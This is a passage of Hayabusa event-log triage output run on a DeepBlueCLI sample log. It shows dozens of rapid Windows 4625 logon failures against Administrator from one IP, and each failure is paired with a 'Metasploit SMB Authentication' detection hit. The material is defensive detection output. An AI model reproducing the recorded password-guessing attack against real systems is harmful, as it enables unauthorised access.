Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XL4ahBqUyGeTONkE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8hJ888Kmyi6KqIPn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.549 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VZ6sfYMHuygnMdY2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XkuSlyTNc5OOoUtd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.636 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Z13YmupcMato8Sd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.676 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JedeMnLPnRJEwhZ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.810 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmy0c0wFheIRzSo4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.810 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sskKdqku5S0f1sWm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.962 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 15Qg0nCXNj7Ub1Sj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.962 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZD6iuaqv70k69G87 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gk3UuqTJmvH1snmN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zaw9iF5mJlyygdnB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Sr5PZAd1qMc7hi3c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l5xbQtyueVq3fJSG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.167 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.203 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g2nP0zz2ofBxTGw6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.203 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SYJheREJmEwj0791 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.237 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: exglD9fnLwaqwRZn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8bSAU1QjasDAsmry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.325 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cfnrtXR7evQBbaOw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.363 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.410 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KYAwjW99chcntPsQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.410 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rG2PYfOTfT7QvbPu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FojDtfDNXq0gQfYu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SUTT0QycbFtyJfNL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.549 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gcbv1lrcYdT9Wuli : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pjdFfvCCfGXo7FUf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.636 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rzqGdWlGglLQx6Z4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3Rt80PMk70sVqbk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: okunzcEHnxUml4SG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.795 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qH0AY3DeIryuHSiN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.886 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DjqtxY5Fly4qAusS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.886 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PXHYu7wAqo7m6mZn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.935 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UaEM3boErBRrCbna : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.990 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7nSzwstH2imPjwah : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.040 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Z6NM0I4vRTXlLKu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jYhjN3f8KlFIEUKy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qWicYt2HXLDgc3kc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uz7yqqxdMrsM2L1g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wqKTguT2Z3OPCxGR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ywpwCM4u6nFSq9oS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k1t5ZBw3HOxux65e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.407 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MtLFQSltjjOjdl2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.534 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.593 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AyFD3cjef0NUMZZ5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.593 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uDYECnF1YTKRKA3K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.656 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pfqxcIVpX9BbsPIM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.700 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mjL5hvyYesMfDISw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3bh8c5ohv55SAX26 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MflfcFDnGU3xUOmz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 